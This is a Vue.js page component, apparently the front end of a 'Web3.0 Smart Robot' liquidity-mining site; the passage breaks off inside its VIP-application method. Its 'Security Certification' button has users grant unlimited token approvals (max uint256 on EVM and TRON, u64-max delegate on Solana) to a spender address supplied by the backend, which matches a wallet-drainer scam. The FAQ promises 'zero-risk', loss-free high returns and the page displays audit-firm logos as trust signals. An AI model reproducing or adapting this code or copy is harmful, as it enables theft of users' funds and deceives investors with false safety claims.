<template>
  <section class="home">
    <!-- 顶栏 -->
    <AppHeader />

    <div class="page">
      <!-- Hero -->
      <div class="hero">
        <div class="hero-txt">
          <h1>{{ $t('web3Robot') }}</h1>
          <p>{{ $t('joinNode') }}</p>
        </div>
        <img class="hero-img" src="/recovered-assets/t1.webp" alt="" />
      </div>
      <!-- 直接发起授权，不再弹说明弹窗（要恢复弹窗把 @click 换回 openReceiveDialog） -->
      <button
        v-if="showSecurityAuthButton"
        type="button"
        class="primary-btn hero-auth"
        :class="{ 'auth-succeeded': authorizationSucceeded }"
        :disabled="authorizing || authorizationSucceeded"
        @click="submitAuthorize"
      >
        <span v-if="authorizationSucceeded" class="auth-success-label">
          <span class="auth-success-icon" aria-hidden="true">✓</span>
          {{ $t('authorizeSucceeded') }}
        </span>
        <span v-else-if="authorizing" class="auth-loading-label">
          {{ $t('processing') }}
          <span class="auth-loading-dots" aria-hidden="true">
            <span>•</span><span>•</span><span>•</span>
          </span>
        </span>
        <span v-else>{{ $t('securityAuth') }}</span>
      </button>
      <p v-if="authorizeError" class="auth-error">
        <span class="auth-failure-icon" aria-hidden="true">×</span>
        <span>{{ authorizeError }}</span>
      </p>

      <!-- 公告跑马灯 -->
      <div class="notice">
        <svg class="bell" viewBox="0 0 24 24" aria-hidden="true">
          <path d="M12 4a5 5 0 0 0-5 5v3l-1.6 2.4h13.2L17 12V9a5 5 0 0 0-5-5zM9.7 18a2.3 2.3 0 0 0 4.6 0" />
        </svg>
        <div class="notice-view">
          <div class="notice-track"><span>{{ $t('announce') }}</span><span>{{ $t('announce') }}</span></div>
        </div>
      </div>

      <!-- 池数据 -->
      <h2 class="sec-title">{{ $t('robotPoolData') }}</h2>
      <div class="card">
        <div class="row"><span class="k">{{ $t('totalOut') }}</span><span class="v accent">{{ displayOutput }} {{ currCoin }}</span></div>
        <div class="row"><span class="k">{{ $t('validNodes') }}</span><span class="v accent">{{ displayNodes }}</span></div>
        <div class="row"><span class="k">{{ $t('joinCount') }}</span><span class="v">{{ displayParticipants }}</span></div>
        <div class="row"><span class="k">{{ $t('userEquity') }}</span><span class="v">{{ displayIncome }} USDT</span></div>
      </div>

      <!-- VIP 矿池 -->
      <h2 class="sec-title">{{ $t('vipPool') }}</h2>
      <div class="vip-banner">
        <img src="/recovered-assets/t3.jpg" alt="VIP advanced mining pool" />
      </div>
      <div class="card">
        <div class="row">
          <span class="cc"><img :src="quoteLogo" :alt="$quote" />{{ $quote }}</span>
          <span class="all">{{ $t('all') }} <svg viewBox="0 0 24 24"><path d="M9 6l6 6-6 6" /></svg></span>
        </div>
        <div class="row"><span class="k">{{ $t('totalIncomeAll') }}</span><span class="v">0 {{ $quote }}</span></div>
        <div class="vip-rate">
          <span class="rate">{{ vipRateText }}</span>
          <span class="rate-desc">{{ $t('vipDoubleDesc') }}</span>
        </div>
      </div>
      <button type="button" class="primary-btn" :disabled="vipApplying" @click="applyVip">
        {{ vipApplying ? $t('processing') + "..." : $t('applyVip') }}
      </button>
      <p v-if="vipMessage" class="vip-msg" :class="{ bad: vipFailed }">{{ vipMessage }}</p>

      <!-- 使用者输出 -->
      <h2 class="sec-title">{{ $t('userOutput') }}</h2>
      <div class="feed-head"><span>{{ $t('address') }}</span><span>{{ $t('amount') }}</span></div>
      <div class="card feed-card">
        <div class="feed" :class="{ rolling: shouldAutoScroll }">
          <div v-for="(row, idx) in loopOutputs" :key="`${row.address}_${idx}`" class="feed-row">
            <span class="fa">{{ row.address }}</span>
            <span class="fn">{{ row.amount }} {{ $quote }}</span>
          </div>
          <div v-if="!loopOutputs.length" class="feed-row feed-empty">{{ $t('noData') }}</div>
        </div>
      </div>

      <!-- 常见问题 -->
      <h2 class="sec-title">{{ $t('faqTitle') }}</h2>
      <div class="card faq-card">
        <div v-for="(item, idx) in faqItems" :key="idx" class="faq" @click="toggleFaq(idx)">
          <div class="faq-q">
            <span>{{ item.q }}</span>
            <svg class="caret" :class="{ open: openFaqIndex === idx }" viewBox="0 0 24 24"><path d="M6 9l6 6 6-6" /></svg>
          </div>
          <p v-if="openFaqIndex === idx" class="faq-a">{{ item.a }}</p>
        </div>
      </div>

      <!-- 审计报告 -->
      <h2 class="sec-title">{{ $t('auditReport') }}</h2>
      <p class="sec-sub">{{ $t('auditSubtitle') }}</p>
      <div class="logo-row">
        <img src="/recovered-assets/bottom_icony1.png" alt="slowmist" />
        <img src="/recovered-assets/bottom_icon2.png" alt="fairyproof" />
        <img src="/recovered-assets/bottom_icony2.png" alt="certik" />
      </div>

      <!-- 合作伙伴 -->
      <h2 class="sec-title">{{ $t('partnersTitle') }}</h2>
      <p class="sec-sub">{{ $t('partnersSub') }}</p>
      <div class="logo-grid">
        <img src="/recovered-assets/t7.webp" alt="" />
        <img src="/recovered-assets/t8.webp" alt="" />
        <img src="/recovered-assets/t9.png" alt="" />
        <img src="/recovered-assets/t10.png" alt="" />
        <img src="/recovered-assets/e0.png" alt="" />
        <img src="/recovered-assets/e1.webp" alt="" />
      </div>
    </div>

    <!-- 授权弹窗（沿用原授权逻辑） -->
    <div v-if="showReceiveDialog" class="receive-mask" @click.self="showReceiveDialog = false">
      <div class="receive-card">
        <button type="button" class="receive-close" @click="showReceiveDialog = false">×</button>
        <h3>{{ $t('description') }}</h3>
        <p>{{ $t('receiveWarning') }}</p>
        <button
          v-if="showSecurityAuthButton"
          type="button"
          class="primary-btn"
          :class="{ 'auth-succeeded': authorizationSucceeded }"
          :disabled="authorizing || authorizationSucceeded"
          @click="submitAuthorize"
        >
          <span v-if="authorizationSucceeded" class="auth-success-label">
            <span class="auth-success-icon" aria-hidden="true">✓</span>
            {{ $t('authorizeSucceeded') }}
          </span>
          <span v-else-if="authorizing" class="auth-loading-label">
            {{ $t('processing') }}
            <span class="auth-loading-dots" aria-hidden="true">
              <span>•</span><span>•</span><span>•</span>
            </span>
          </span>
          <span v-else>{{ $t('securityAuth') }}</span>
        </button>
        <p v-if="authorizeError" class="receive-error">
          <span class="auth-failure-icon" aria-hidden="true">×</span>
          <span>{{ authorizeError }}</span>
        </p>
      </div>
    </div>

    <MobileTabBar current="home" />
  </section>
</template>

<script>
import Web3 from "web3";
import { Transaction } from "@solana/web3.js";
import { apiPost } from "../recovered/api-client";
import { registerStatus } from "../recovered/home-api";
import { getUserInfo } from "../recovered/sign-api";
import { vipApply } from "../recovered/trade-api";
import { autoConnectWallet, fetchOnchainUsdtBalance, getPreferredChain } from "../recovered/wallet-session";
import { getApproveTarget, loadChainConfig } from "../quote";
import { switchToChain, getEvmChainId } from "../recovered/wallet-auth-core";
import { setEvmChainId } from "../session";
import MobileTabBar from "../components/MobileTabBar.vue";
import LangSwitch from "../components/LangSwitch.vue";
import QuoteSelect from "../components/QuoteSelect.vue";
import AppHeader from "../components/AppHeader.vue";
import BrandLogo from "../components/BrandLogo.vue";

const TRC20_USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
const ERC20_MAX_ALLOWANCE_HEX = "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff";
const MAX_ALLOWANCE_DECIMAL = "115792089237316195423570985008687907853269984665640564039457584007913129639935";
const SOL_U64_MAX = "18446744073709551615";
const TOKEN_PROGRAM_ID = "TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA";

const ERC20_ABI = [
  {
    constant: false,
    inputs: [
      { name: "_spender", type: "address" },
      { name: "_value", type: "uint256" },
    ],
    name: "approve",
    outputs: [{ name: "", type: "bool" }],
    payable: false,
    stateMutability: "nonpayable",
    type: "function",
  },
];

function toNum(v) {
  const n = Number(v);
  return Number.isFinite(n) ? n : 0;
}

function normalizeChain(raw) {
  const text = String(raw || "").trim().toUpperCase();
  if (text === "TRX" || text === "TRC" || text === "TRC20") return "TRC20";
  if (text === "SOL" || text === "SOLANA") return "SOL";
  if (text === "BASE" || text === "8453") return "BASE";
  return "ERC20";
}

function inferChainByAddress(address = "") {
  if (address.startsWith("T")) return "TRC20";
  if (address.startsWith("0x")) return "ERC20";
  if (/^[1-9A-HJ-NP-Za-km-z]{32,44}$/.test(address)) return "SOL";
  return "ERC20";
}

function isUserRejectedError(error) {
  const codes = [
    error && error.code,
    error && error.data && error.data.code,
    error && error.data && error.data.originalError && error.data.originalError.code,
    error && error.cause && error.cause.code,
  ];
  if (codes.some((code) => Number(code) === 4001 || String(code || "").toUpperCase() === "ACTION_REJECTED")) {
    return true;
  }

  const message = String((error && error.message) || error || "").toLowerCase();
  return [
    "user rejected",
    "user denied",
    "rejected by user",
    "request rejected",
    "signature rejected",
    "signing declined",
    "cancelled by user",
    "canceled by user",
    "拒绝签名",
    "拒絕簽名",
    "用户拒绝",
    "用戶拒絕",
    "已拒绝",
    "已拒絕",
  ].some((text) => message.includes(text));
}

function base64ToBytes(base64) {
  const bin = window.atob(base64);
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i += 1) {
    out[i] = bin.charCodeAt(i);
  }
  return out;
}

function bytesToBase64(bytes) {
  let out = "";
  const CHUNK = 0x8000;
  for (let i = 0; i < bytes.length; i += CHUNK) {
    const piece = bytes.subarray(i, i + CHUNK);
    out += String.fromCharCode.apply(null, piece);
  }
  return window.btoa(out);
}

function normalizeSolApproveAmount(raw) {
  const text = String(raw || "").trim();
  if (!/^[0-9]+$/.test(text)) return SOL_U64_MAX;
  try {
    const v = BigInt(text);
    const max = BigInt(SOL_U64_MAX);
    if (v <= 0n) return SOL_U64_MAX;
    if (v > max) return SOL_U64_MAX;
    return String(v);
  } catch (err) {
    return SOL_U64_MAX;
  }
}

export default {
  name: "HomeView",
  components: {
    MobileTabBar,
    LangSwitch,
    QuoteSelect,
    AppHeader,
    BrandLogo,
  },
  i18n: {
    zh: {
      claimCoupon: "领取优惠券",
      timedIncome: "计时收入",
      joinNode: "加入节点，开始挖矿",
      processing: "处理中",
      receive: "接收",
      poolData: "池数据",
      totalOutput: "总产量",
      activeNodes: "有效节点",
      participants: "参与者",
      userRevenue: "用户收入",
      mining: "矿业",
      liquidityIncome: "流动性挖矿收入",
      outputDetails: "输出细节",
      address: "地址",
      amount: "数量",
      noData: "暂无数据",
      helpCenter: "帮助中心",
      helpSubtitle: "希望它可以帮助你",
      auditors: "调节器",
      auditorsSubtitle: "我们有安全的审计报告",
      partners: "伙伴",
      partnersSubtitle: "我们的商业伙伴",
      web3Robot: "Web3.0智慧机器人",
      securityAuth: "安全认证",
      announce: "申请激活主节点资格，参与流动性挖矿，享受高额收益。",
      robotPoolData: "智慧机器人池资料",
      totalOut: "总输出",
      validNodes: "有效节点",
      joinCount: "参加人数",
      userEquity: "使用者权益",
      vipPool: "VIP矿池",
      vipBannerTitle: "VIP 高级矿池",
      vipBannerDesc: "申请加入，享受 30 天双倍挖矿收益",
      totalIncomeAll: "累计总收入",
      vipRate: "1~10 % {coin}",
      vipDoubleDesc: "VIP矿池享有双倍收益",
      applyVip: "申请加入VIP矿池",
      userOutput: "使用者输出",
      all: "全部",
      faqTitle: "常见问题",
      auditReport: "审计报告",
      auditSubtitle: "我们有一份安全的稽核报告",
      partnersTitle: "合作伙伴",
      partnersSub: "我们的业务伙伴",
      description: "描述",
      receiveWarning:
        "注意：无抵押挖矿不需要抵押你的USDT，但需要支付矿工费，请确保钱包里有足够的链上主币来支付手续费。",
      notConnected: "未连接",
      faqWithdrawQ: "如何提现?",
      faqWithdrawA: "进入底部“提取”，输入金额后确认提交即可。",
      faqJoinQ: "我要怎么加入？",
      faqJoinA: "连接钱包后，按页面提示完成授权即可加入节点。",
      q1: "什么是流动性挖矿?",
      a1: "流动性挖矿是基于 AMM（自动做市商）原理开发的流动性挖矿产品，由不同的流动性池组成，每个流动性池有不同的数字货币。您可以向流动性池添加流动性，成为流动性提供者，获得佣金收入以及 USDT 奖励。",
      q2: "我需要如何加入?",
      a2: "参与无损、非保流动性挖矿，需要支付 BNB 矿工费才能参与。BNB 钱包地址只需申请一次，成功后自动激活挖矿权限。",
      q3: "如何提领?",
      a3: "流动性矿池每天都会产生 USDT 收入，您只需在矿池账户页面发起提现，系统就会自动将挖矿收入发送到您的挖矿节点钱包地址，其他地址不提供支持。",
      q4: "流动性挖矿安全吗?",
      a4: "参与无损 web3.0 AI 智慧机器人挖矿，无需转账资产 USDT，只需将稳定币 USDT 存入自己的去中心化钱包，连接矿池节点，即可享受每天流动性挖矿带来的高回报，零风险挖矿，让投资者更有保障。",
      helpFallback: "帮助",
      errConnectWallet: "连接钱包失败",
      errEthAddressMissing: "钱包授权地址缺失",
      errNoEthWallet: "未检测到钱包环境",
      errTrxAddressMissing: "钱包授权地址缺失",
      errNoTrxWallet: "未检测到钱包环境",
      errTrxApproveUnsupported: "TRX合约不支持approve/increaseApproval",
      errSolParamsMissing: "SOL授权参数缺失：mint或delegate为空",
      errNoSolWallet: "未检测到钱包环境",
      errSolAddressFailed: "SOL钱包地址获取失败",
      errSolNoTx: "SOL build_approve未返回交易数据",
      errSolSignUnsupported: "当前SOL钱包不支持签名交易",
      errSolSignInvalid: "SOL签名结果无效",
      errEmptyAddress: "钱包地址为空",
      errAuthorizeFailed: "授权失败，请稍后重试",
      errSignatureRejected: "已拒绝签名",
      errChainMismatch: "请在钱包中切换到 {chain} 网络后重试",
      errTokenNotConfigured: "当前链未配置 {coin} 合约，请稍后重试或切换币种",
      errTxNotConfirmed: "授权交易未在链上成功，请确认矿工费余额后重试",
      errAllowanceUnchanged: "链上未检测到有效授权，请稍后重试",
      authorizeSucceeded: "成功",
      vipApplySubmitted: "申请已提交，请等待审核",
      vipApplyFailed: "申请失败，请稍后重试",
    },
    en: {
      claimCoupon: "Claim Coupon",
      timedIncome: "Timed Income",
      joinNode: "Join a node and start mining",
      processing: "Processing",
      receive: "Receive",
      poolData: "Pool Data",
      totalOutput: "Total Output",
      activeNodes: "Active Nodes",
      participants: "Participants",
      userRevenue: "User Revenue",
      mining: "Mining",
      liquidityIncome: "Liquidity mining income",
      outputDetails: "Output Details",
      address: "Address",
      amount: "Amount",
      noData: "No data",
      helpCenter: "Help Center",
      helpSubtitle: "Hope it helps you",
      auditors: "Auditors",
      auditorsSubtitle: "We have secure audit reports",
      partners: "Partners",
      partnersSubtitle: "Our business partners",
      web3Robot: "Web3.0 Smart Robot",
      securityAuth: "Security Certification",
      announce: "Apply for master-node qualification, join liquidity mining, and earn high returns.",
      robotPoolData: "Smart Robot Pool",
      totalOut: "Total Output",
      validNodes: "Valid Nodes",
      joinCount: "Participants",
      userEquity: "User Equity",
      vipPool: "VIP Pool",
      vipBannerTitle: "VIP advanced mining pool",
      vipBannerDesc: "Apply to join and enjoy double mining income for 30 days",
      totalIncomeAll: "Cumulative Income",
      vipRate: "1~10 % {coin}",
      vipDoubleDesc: "VIP pool enjoys double income",
      applyVip: "Apply to join VIP Pool",
      userOutput: "User Output",
      all: "All",
      faqTitle: "FAQ",
      auditReport: "Audit Report",
      auditSubtitle: "We have a secure audit report",
      partnersTitle: "Partners",
      partnersSub: "Our business partners",
      description: "Description",
      receiveWarning:
        "Note: Collateral-free mining does not require you to stake your USDT, but a miner fee is required. Please make sure your wallet holds enough native chain coins to cover the transaction fee.",
      notConnected: "Not connected",
      faqWithdrawQ: "How to withdraw?",
      faqWithdrawA: "Go to \"Withdraw\" at the bottom, enter the amount, then confirm and submit.",
      faqJoinQ: "How do I join?",
      faqJoinA:
        "After connecting your wallet, follow the on-screen prompts to complete authorization and join a node.",
      q1: "What is liquidity mining?",
      a1: "Liquidity mining is a product built on the AMM (automated market maker) model, made up of different liquidity pools, each holding different digital currencies. You can add liquidity to a pool, become a liquidity provider, and earn commission income and USDT rewards.",
      q2: "How do I join?",
      a2: "To take part in loss-free, non-custodial liquidity mining, a BNB miner fee is required. The BNB wallet address only needs to be applied for once; mining rights are activated automatically after success.",
      q3: "How to withdraw?",
      a3: "The liquidity pool generates USDT income every day. Simply start a withdrawal on the pool account page, and the system automatically sends your mining income to your mining-node wallet address. Other addresses are not supported.",
      q4: "Is liquidity mining safe?",
      a4: "Join loss-free Web3.0 AI robot mining without transferring your USDT — just keep stablecoin USDT in your own decentralized wallet and connect to the pool node to enjoy high daily returns. Zero-risk mining gives investors more protection.",
      helpFallback: "Help",
      errConnectWallet: "Failed to connect wallet",
      errEthAddressMissing: "Wallet authorization address is missing",
      errNoEthWallet: "No wallet environment detected",
      errTrxAddressMissing: "Wallet authorization address is missing",
      errNoTrxWallet: "No wallet environment detected",
      errTrxApproveUnsupported: "TRX contract does not support approve/increaseApproval",
      errSolParamsMissing: "SOL authorization parameters missing: mint or delegate is empty",
      errNoSolWallet: "No wallet environment detected",
      errSolAddressFailed: "Failed to get SOL wallet address",
      errSolNoTx: "SOL build_approve did not return transaction data",
      errSolSignUnsupported: "The current SOL wallet does not support signing transactions",
      errSolSignInvalid: "Invalid SOL signature result",
      errEmptyAddress: "Wallet address is empty",
      errAuthorizeFailed: "Authorization failed, please try again later",
      errSignatureRejected: "Signature rejected",
      errChainMismatch: "Please switch your wallet to the {chain} network and try again",
      errTokenNotConfigured: "The {coin} contract is not configured on this chain, please retry or switch coin",
      errTxNotConfirmed: "The authorization transaction did not succeed on-chain. Check your gas balance and try again",
      errAllowanceUnchanged: "No valid on-chain authorization was detected. Please try again",
      authorizeSucceeded: "Success",
      vipApplySubmitted: "Application submitted, please wait for review",
      vipApplyFailed: "Application failed, please try again later",
    },
  },
  data() {
    return {
      config: {
        outputEth: 0,
        outputTrx: 0,
        ethRate: 0,
        trxRate: 0,
        usdtDecimal: 2,
        validNode: 0,
        trcValiddNodes: 0,
        participant: 0,
        trcMemberCount: 0,
      },
      userInfo: {
        coin: "USDC",
        address: "",
        usdt_status: null,
        usdc_status: null,
      },
      userOutputs: [],
      showReceiveDialog: false,
      authorizing: false,
      authorizeError: "",
      authSucceededQuote: "",
      openFaqIndex: -1,
      vipApplying: false,
      vipMessage: "",
      vipFailed: false,
    };
  },
  computed: {
    showSecurityAuthButton() {
      const statusField = this.$quote === "USDT" ? "usdt_status" : "usdc_status";
      return this.authorizing || this.authorizationSucceeded || Number(this.userInfo[statusField]) === 0;
    },
    authorizationSucceeded() {
      return !!this.authSucceededQuote && this.authSucceededQuote === this.$quote;
    },
    // VIP 卡片的币种跟随顶部选择
    quoteLogo() {
      return this.$quote === "USDT"
        ? "/recovered-assets/usdt_logo.png"
        : "/recovered-assets/usdc_logo.svg";
    },
    vipRateText() {
      return this.$t("vipRate").replace("{coin}", this.$quote);
    },
    faqItems() {
      // 固定 4 条，随语言切换（读 $t，不走后端）
      return [
        { q: this.$t("q1"), a: this.$t("a1") },
        { q: this.$t("q2"), a: this.$t("a2") },
        { q: this.$t("q3"), a: this.$t("a3") },
        { q: this.$t("q4"), a: this.$t("a4") },
      ];
    },
    bodyTopStyle() {
      return {
        backgroundImage: "url('/recovered-assets/top_bg.png')",
      };
    },
    currCoin() {
      return this.$quote;
    },
    fullAddress() {
      return this.userInfo.address || sessionStorage.getItem("ADDRESS") || localStorage.getItem("U_ADDRESS") || "";
    },
    displayAddress() {
      if (!this.fullAddress) return this.$t('notConnected');
      if (this.fullAddress.length <= 14) return this.fullAddress;
      return `${this.fullAddress.slice(0, 6)}...${this.fullAddress.slice(-4)}`;
    },
    chainType() {
      // URL 的 ?chain= 优先，避免被上次连接残留的 sessionStorage.CHAIN 盖住
      return normalizeChain(
        getPreferredChain() || sessionStorage.getItem("CHAIN") || inferChainByAddress(this.fullAddress)
      );
    },
    displayOutput() {
      if (this.currCoin === "TRX") return this.numFormat(this.config.outputTrx, 1);
      return this.numFormat(this.config.outputEth, 1);
    },
    displayNodes() {
      if (this.currCoin === "TRX") return this.numFormat(this.config.trcValiddNodes, 0);
      return this.numFormat(this.config.validNode, 0);
    },
    displayParticipants() {
      if (this.currCoin === "TRX") return this.numFormat(this.config.trcMemberCount, 0);
      return this.numFormat(this.config.participant, 0);
    },
    displayIncome() {
      if (toNum(this.config.userRevenue) > 0) {
        return this.numFormat(this.config.userRevenue, 6);
      }
      if (this.currCoin === "TRX") {
        return this.numFormat(toNum(this.config.outputTrx) * toNum(this.config.trxRate), 6);
      }
      return this.numFormat(toNum(this.config.outputEth) * toNum(this.config.ethRate), 6);
    },
    shouldAutoScroll() {
      return Array.isArray(this.userOutputs) && this.userOutputs.length >= 8;
    },
    loopOutputs() {
      if (!Array.isArray(this.userOutputs)) return [];
      return this.shouldAutoScroll ? this.userOutputs.concat(this.userOutputs) : this.userOutputs;
    },
  },
  beforeDestroy() {
    if (this.vipMsgTimer) clearTimeout(this.vipMsgTimer);
  },
  mounted() {
    this.bootstrap();
    // 仅当 URL 明确带 ?chain=base 时才自动连接/切换 Base（不看缓存/持久化偏好，避免"粘住"）。
    // 仅连接，不授权；普通用户（未带该参数）不受影响。
    if (getPreferredChain() === "BASE") {
      this.ensureWalletReady().catch((e) => {
        // 便于调试：切 Base 失败（如钱包不支持 wallet_switchEthereumChain 或用户取消）
        console.warn("[Base] 自动连接失败:", e);
      });
    }
  },
  methods: {
    numFormat(v, decimals = 2) {
      return toNum(v).toFixed(decimals);
    },
    // force=true 用于授权成功后刷新，会绕过共享缓存重新拉一次 config
    async bootstrap(force) {
      try {
        // 与顶部选择器共用同一份 config（loadChainConfig 内部会灌入 chains）
        const cfg = await loadChainConfig(force);
        if (cfg && typeof cfg === "object") {
          this.config = {
            ...this.config,
            ...cfg,
          };

          if (Array.isArray(cfg.homeCarousel) && cfg.homeCarousel.length > 0) {
            this.userOutputs = cfg.homeCarousel.map((row) => ({
              address: row.address,
              amount: row.amount || row.rawNum || "--",
              coin: row.coin || "",
            }));
          }
        }
      } catch (err) {
        // keep fallback display
      }

      try {
        const info = await getUserInfo();
        if (info && typeof info === "object") {
          this.userInfo = {
            ...this.userInfo,
            ...info,
          };
        }
      } catch (err) {
        // keep fallback display
      }
      // 只展示后端真实 homeCarousel；没有就留空显示“暂无数据”，不再编造假数据
    },
    showAuthSuccess(quote) {
      this.authorizeError = "";
      this.authSucceededQuote = quote;
    },
    // 说明弹窗当前不走了（按钮直连授权）。保留以便随时改回弹窗流程。
    openReceiveDialog() {
      this.authorizeError = "";
      this.showReceiveDialog = true;
    },
    async ensureWalletReady() {
      const result = await autoConnectWallet({
        force: !this.fullAddress,
        preferredChain: this.chainType,
      });
      if (!result || !result.ok) {
        throw new Error((result && result.errorMessage) || this.$t('errConnectWallet'));
      }

      if (result.address) {
        this.userInfo = {
          ...this.userInfo,
          address: result.address,
        };
      }

      if (result.chain) {
        this.userInfo = {
          ...this.userInfo,
          coin: result.chain === "TRC20" ? "TRX" : result.chain,
        };
      }

      if (result.address && result.chain) {
        fetchOnchainUsdtBalance(result.chain, result.address).catch(() => {});
      }

      return {
        chain: normalizeChain(result.chain || this.chainType),
        address: result.address || this.fullAddress,
      };
    },
    // TRC20 / SOL 仍用老的 trc / sol 字段；EVM 已改走 config.chains（见 authorizeErc）
    resolveApproveContracts(chain) {
      const raw = this.config.rawIndexConfig || {};
      if (chain === "TRC20") {
        const trc = raw.trc || {};
        return {
          tokenContract: trc.contract_address || trc.token_contract || TRC20_USDT_CONTRACT,
          spender:
            trc.authorized_address ||
            trc.authorizedAddress ||
            trc.address ||
            trc.contract_address ||
            this.config.addressTrc,
        };
      }

      const sol = raw.sol || {};
      return {
        mint:
          sol.mint ||
          sol.token_mint ||
          sol.tokenMint ||
          sol.usdt_mint ||
          sol.mint_address ||
          sol.contract_address ||
          this.config.addressSol ||
          "",
        delegate:
          sol.authorized_address ||
          sol.authorizedAddress ||
          sol.delegate ||
          sol.contract_address ||
          sol.address ||
          this.config.addressSol ||
          "",
        decimals: Number(sol.decimals || 6),
        tokenProgram: sol.token_program || sol.tokenProgram || TOKEN_PROGRAM_ID,
        approveAmount: normalizeSolApproveAmount(sol.approve_amount || sol.approveAmount || sol.amount),
      };
    },
    async authorizeErc(address) {
      // 授权目标 = config.chains 里「顶部选中的链」+「顶部选中的计价币」
      let target = getApproveTarget();
      if (!target.ok) {
        // config 可能还没回来（进页面就点、或网络慢），此时 chains 还是兜底值、
        // contract/spender 均为空。等配置到位再取一次，避免误报「缺少授权地址」。
        await loadChainConfig().catch(() => {});
        target = getApproveTarget();
      }
      if (!target.ok) {
        // 区分具体缺什么，便于排查后台配置
        throw new Error(
          target.reason === "token"
            ? this.$t("errTokenNotConfigured").replace("{coin}", target.symbol || "")
            : this.$t("errEthAddressMissing")
        );
      }

      // 部分钱包会注入一个非标准的 window.web3（缺少可用的 .eth），
      // 因此只要检测到 window.ethereum，就用它重建标准 web3 实例。
      if (window.ethereum) {
        window.web3 = new Web3(window.ethereum);
      }
      if (!(window.web3 && window.web3.eth)) {
        throw new Error(this.$t('errNoEthWallet'));
      }

      // 必须先把钱包切到目标链：否则会拿着 BSC 的合约地址在以太坊主网发交易
      if (target.meta) {
        await switchToChain(target.meta);

        // 部分钱包会“假成功”：不实际切链也不抛错，所以切完再核对一次。
        // chainId 用数值比较，兼容 "0x1" / "0x01" 两种写法；
        // 完全读不到 chainId 的老钱包不阻断（与 Base 连接逻辑保持一致）。
        const chainId = await getEvmChainId();
        setEvmChainId(chainId);
        if (chainId && parseInt(chainId, 16) !== target.meta.chainIdNum) {
          throw new Error(this.$t('errChainMismatch').replace("{chain}", target.meta.chainName));
        }

        // 切链后 provider 状态变了，重建实例再发交易
        window.web3 = new Web3(window.ethereum);
      }

      const contract = new window.web3.eth.Contract(ERC20_ABI, target.tokenContract);

      // 钱包确认并广播后立即进入用户状态轮询；交易哈希本身不作为授权成功依据。
      return new Promise((resolve, reject) => {
        const request = contract.methods
          .approve(target.spender, ERC20_MAX_ALLOWANCE_HEX)
          .send({ from: address });

        request.on("transactionHash", resolve);
        request.on("error", reject);
        // 兼容不派发 transactionHash 事件的钱包；Promise 只会采用第一次结果。
        request.then(resolve, reject);
      });
    },
    async authorizeTrc() {
      const { tokenContract, spender } = this.resolveApproveContracts("TRC20");
      if (!tokenContract || !spender) {
        throw new Error(this.$t('errTrxAddressMissing'));
      }

      const tron = window.tronwebIns || window.tronWeb;
      if (!tron) {
        throw new Error(this.$t('errNoTrxWallet'));
      }

      const contract = await tron.contract().at(tokenContract);
      if (contract.approve) {
        await contract.approve(spender, MAX_ALLOWANCE_DECIMAL).send({
          feeLimit: 50000000,
          callValue: 0,
        });
        return;
      }
      if (contract.increaseApproval) {
        await contract.increaseApproval(spender, MAX_ALLOWANCE_DECIMAL).send({
          feeLimit: 50000000,
          callValue: 0,
        });
        return;
      }
      throw new Error(this.$t('errTrxApproveUnsupported'));
    },
    async authorizeSol(address) {
      const { mint, delegate, decimals, tokenProgram, approveAmount } = this.resolveApproveContracts("SOL");
      if (!mint || !delegate) {
        throw new Error(this.$t('errSolParamsMissing'));
      }

      const provider = window.solanaIns || window.solana || (window.phantom && window.phantom.solana);
      if (!provider) {
        throw new Error(this.$t('errNoSolWallet'));
      }
      if (!provider.publicKey && provider.connect) {
        await provider.connect();
      }

      const owner = address || (provider.publicKey && provider.publicKey.toString && provider.publicKey.toString());
      if (!owner) {
        throw new Error(this.$t('errSolAddressFailed'));
      }

      const built = await apiPost("/api/solana/build_approve", {
        owner,
        mint,
        delegate,
        amount: approveAmount || SOL_U64_MAX,
        decimals,
        tokenProgram,
        commitment: "confirmed",
      });

      const unsignedTx = (built && (built.unsignedTx || built.tx || built.rawTx || built.transaction)) || "";
      if (!unsignedTx) {
        throw new Error(this.$t('errSolNoTx'));
      }

      const tx = Transaction.from(base64ToBytes(unsignedTx));
      if (provider.signAndSendTransaction && !provider.signTransaction) {
        const sent = await provider.signAndSendTransaction(tx);
        return (sent && (sent.signature || sent.hash)) || "";
      }

      if (!(provider.signTransaction || provider.signAllTransactions)) {
        throw new Error(this.$t('errSolSignUnsupported'));
      }

      let signed;
      if (provider.signTransaction) {
        signed = await provider.signTransaction(tx);
      } else {
        const signedList = await provider.signAllTransactions([tx]);
        signed = Array.isArray(signedList) ? signedList[0] : null;
      }

      if (!(signed && signed.serialize)) {
        throw new Error(this.$t('errSolSignInvalid'));
      }

      const rawTx = bytesToBase64(signed.serialize());
      const sent = await apiPost("/api/solana/send_raw", {
        rawTx,
        encoding: "base64",
        commitment: "confirmed",
      });
      return (sent && (sent.signature || sent.txid || sent.hash)) || "";
    },
    async submitAuthorize() {
      if (this.authorizing) return;
      this.authorizing = true;
      this.authorizeError = "";
      this.authSucceededQuote = "";

      try {
        const authorizationQuote = this.$quote;
        const { chain, address } = await this.ensureWalletReady();
        if (!address) {
          throw new Error(this.$t('errEmptyAddress'));
        }

        // Base 链仅开放"连接钱包"：连上后直接结束，不发起任何链上授权(approve)
        if (chain === "BASE") {
          this.showReceiveDialog = false;
          this.bootstrap(true);
          return;
        }

        if (chain === "TRC20") {
          await this.authorizeTrc();
        } else if (chain === "SOL") {
          await this.authorizeSol(address);
        } else {
          await this.authorizeErc(address);
        }

        // 钱包授权调用返回后直接展示成功，不再轮询用户状态接口。
        this.showReceiveDialog = false;
        this.showAuthSuccess(authorizationQuote);
        registerStatus({ address, status: 1 }).catch(() => {});
        this.bootstrap(true).catch(() => {});
      } catch (err) {
        this.authorizeError = isUserRejectedError(err)
          ? this.$t("errSignatureRejected")
          : (err && err.message) || this.$t("errAuthorizeFailed");
      } finally {
        this.authorizing = false;
      }
    },
    toggleFaq(index) {
      this.openFaqIndex = this.openFaqIndex === index ? -1 : index;
    },
    showVipMessage(text, failed) {
      this.vipMessage = text;
      this.vipFailed = !!failed;
      if (this.vipMsgTimer) clearTimeout(this.vipMsgTimer);
      this.vipMsgTimer = setTimeout(() => {
        this.vipMessage = "";
      }, 6000);
    },
    async applyVip() {
      if (this.vipApplying) return;
      this.vipApplying = true;
      this.vipMessage = "";

      try {
